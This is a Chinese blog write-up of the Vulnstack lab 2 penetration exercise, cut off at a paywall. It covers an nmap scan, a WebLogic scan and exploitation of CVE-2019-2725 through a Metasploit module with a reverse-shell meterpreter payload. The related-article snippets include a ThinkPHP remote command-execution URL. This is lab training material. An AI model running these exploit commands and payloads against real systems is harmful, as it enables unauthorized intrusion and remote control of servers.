记录渗透靶场实战【网络安全】

最新推荐文章于 2025-02-08 11:46:04 发布
最新推荐文章于 2025-02-08 11:46:04 发布
阅读量2.7w 收藏 315
点赞数 64
文章标签: web安全 网络安全 信息安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kali_Ma/article/details/121180496
版权

第一次写靶场实战的文章,有不足之处还请多多指教。本次实战的靶场是红日安全vulnstack系列的第二个靶场。

靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

环境搭建

网络环境

image.png

网卡配置

只需要在VM上选择对应网卡即可,不需要在靶机中进行配置。

DC

IP:10.10.10.10 (VMnet5)
OS:Windows 2012(x64)

WEB

IP1:192.168.111.80 (VMnet6)
IP2:10.10.10.80 (VMnet5)
OS:Windows 2008(x64)

PC

IP1:192.168.111.201 (VMnet6)
IP2:10.10.10.201 (VMnet5)
OS:Windows 7(x86)

开启靶场

进入C:\Oracle\Middleware\user_projects\domains\base_domain目录下,双击startWebLogic开启服务。

image.png

外网渗透

我们已知当前Web服务器的公网IP为192.168.111.80,对Web服务器进行端口扫描,以期发现是否有可以利用的端口服务,从而突破边界。

端口扫描

nmap -sV -Pn -T4 192.168.111.80

image.png

【一>所有资源获取<一】
1、200多本网络安全系列电子书(该有的都有了)
2、全套工具包(最全中文版,想用哪个用哪个)
3、100份src源码技术文档(项目学习不停,实践得真知)
4、网络安全基础入门、Linux、web安全、攻防方面的视频(2021最新版)
5、网络安全学习路线(告别不入流的学习)
6、ctf夺旗赛解析(题目解析实战操作)

漏洞探测

通过端口扫描我们发现Web服务器开启了80、7001等端口,其他端口如445、1433、3389等也可以使用一些RCE漏洞或弱口令直接进入Web服务器。这里我们先访问Web服务,发现80端口页面是空白的,在7001端口我们发现Web服务器开启了Weblogic,尝试使用WeblogicScan脚本探测漏洞:

python3 WeblogicScan.py -u 192.168.111.80 -p 7001

image.png

漏洞利用

通过脚本探测发现存在CVE-2019-2725,我们可以使用网上的exp,这里我们使用msf自带的漏洞利用模块:

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set target Windows
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.111.80
set lhost 192.168.111.128
run

最低0.47元/天 解锁文章
kali_Ma
关注
记一次内网靶场渗透WP
include_voidmain的博客
04-19 3209
0x01 前言 此次靶场渗透思路,攻击者通过VPS(kali-linux)服务器以WEB_1-(ubuntu,双网卡)为入口。 横向到一个WEB_2(windows 7,双网卡)通过双网卡进行横向探测,发现OS_3,利用目标存在的系统漏洞获取目标系统权限。 0x02 靶场拓扑 0x03 渗透过程 访问WEB_1服务器地址: http://192.168.28.135发现为JunAMS 扫描后台管理地址成功获取地址: http://192.168.28.135/admin.php并成功跳转至管理页面。 J
网络安全实战靶场渗透技术
kali_Ma的博客
10-20 8690
靶机主要是从信息收集开始,发现是flask搭建的,然后使用flask unsign进行解密,暴力破解。接着使用枚举出的用户进行FTP登录,FTP登录之后,下载pdf文件,发现管理员账号和密码规则,然后登录FTP管理员,接着下载压缩包,进行文件分析,发现可以使用CVE-2021-23639历史漏洞可以获取权限,在文件中发现存在mysql服务,接着进行权限提升,获取到了root文件。
记一次详细的实战渗透
蚁景网安学院
11-03 2296
一次授权的渗透测试,过程比较详细,充满了巧合,也算比较有意思,直接记录一下。整体来说难度不大,没有域,难点在免杀,能拿报表系统是巧合,转发上线没意外,似乎内网环境比较大。
渗透实战(提高你的实战能力)_渗透测试实战
最新发布
jennycisp的博客
02-08 1125
一、靶机地址下载靶机后,双击用vmware打开。、靶机渗透1、打开靶场显示的是一个登陆界面。2、看到这个界面,我们不知道账号和密码,先外网打点。使用kali中的端口扫描工具:nmap 判断这个靶场地址的ip地址3、发现存在80端口,我们去通过ip去访问web界面。4、查看一下端口详细信息5、没发现什么其他了。我们现在对它进行目录扫描,看看有没有什么特殊的东西。一个一个去看6、可以输入,尝试尝试。发现了这个,我们去看看txt文件。发现我的输入都被保存在txt文件中了。
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5825
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 4731
红队靶场内网渗透(从DMZ主机渗透到域内机器)
网络靶场实战-记一次大型内网渗透实践 【完结篇】
蛇矛实验室
12-13 1821
本场景基于某业务架构进行搭建,场景内包含了100余台主机以及20余子网,内置相关应用,包括Web服务、邮件服务、文件服务、OA服务等,但本场景多通过水坑攻击、钓鱼攻击、服务爆破等相关技术,其中包含了Chrome漏洞利用、Office漏洞利用等。通过本场景可以进行相关攻防技术训练。
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 3221
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
记一次内网渗透(ATT&CK第五个攻防靶场
a168xzy的博客
12-10 1809
记一次内网渗透(ATT&CK第五个攻防靶场靶场下载地址:download 渗透测试 拿到题目打开是一个thinkphp框架 测试thinkphp版本 找到此版本漏洞的poc 可以命令执行 http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 查看当前路径 http://192.1
网络安全】DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 6659
借助DVWA靶场,对用户登录进行渗透测试
vulnstack内网渗透环境靶场-1 大全
鸣蜩十四的博客
08-19 3128
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 这次靶场一共三个环境,win7,win2003,win2008,win7是web服务器,上面我们需要两张网卡,一张nat模式,一张主机模式,win2003是域成员,win2008为域控 Win7配置如下: 在win7中使用phpstudy开
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 8617
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
CH4INRULZ_v1.0.1内网渗透靶场
weixin_51339377的博客
03-17 572
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通过御剑进行扫描 http://192.168.206.146/index.html.bak frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 通过工具john进行一下解密 把解密结果存储到相应文件中 cd ...
简单的内网渗透靶场实战(tp漏洞、msf、psexec横向渗透、权限维持)
Web安全工具库
07-30 3385
​ 前言环境搭建web服务器渗透nmap探测端口thinkphp getshellthinkphp批量检测内网信息搜集内网渗透上线msf信息搜集获取凭证思路内网横向移动MS17-010尝试psexec尝试ipc连接关闭域控防火墙psexec尝试*2登录远程桌面权限维持DSRM后门日志清除 1 前言 在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 2环境搭建 靶场: win7(内):192.168.138...
一次简单的内网靶场渗透
weixin_46330465的博客
02-19 1951
本套靶场来源于渗透攻击红队。大佬勿喷,请多多指教。
记一次内网靶场渗透测试
m0_60571990的博客
10-13 1336
记一次内网靶场渗透测试
内网渗透之CFS三层靶场渗透
yc11223344的博客
12-19 1235
1.在连接target2的时候代理总是断开,反弹不了shell,后来重新启动msf,重新配置,最终获得了shell2.proxychains4使用不了sqlmap,不清楚什么原因。
三层内网渗透笔记-靶场(teamssix.com)
mingyqf的博客
02-02 909
渗透流程参考:https://mp.weixin.qq.com/s/oa_7YBrvtCRIYlBbwcqoVQ,部分截图引用该公众号。
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值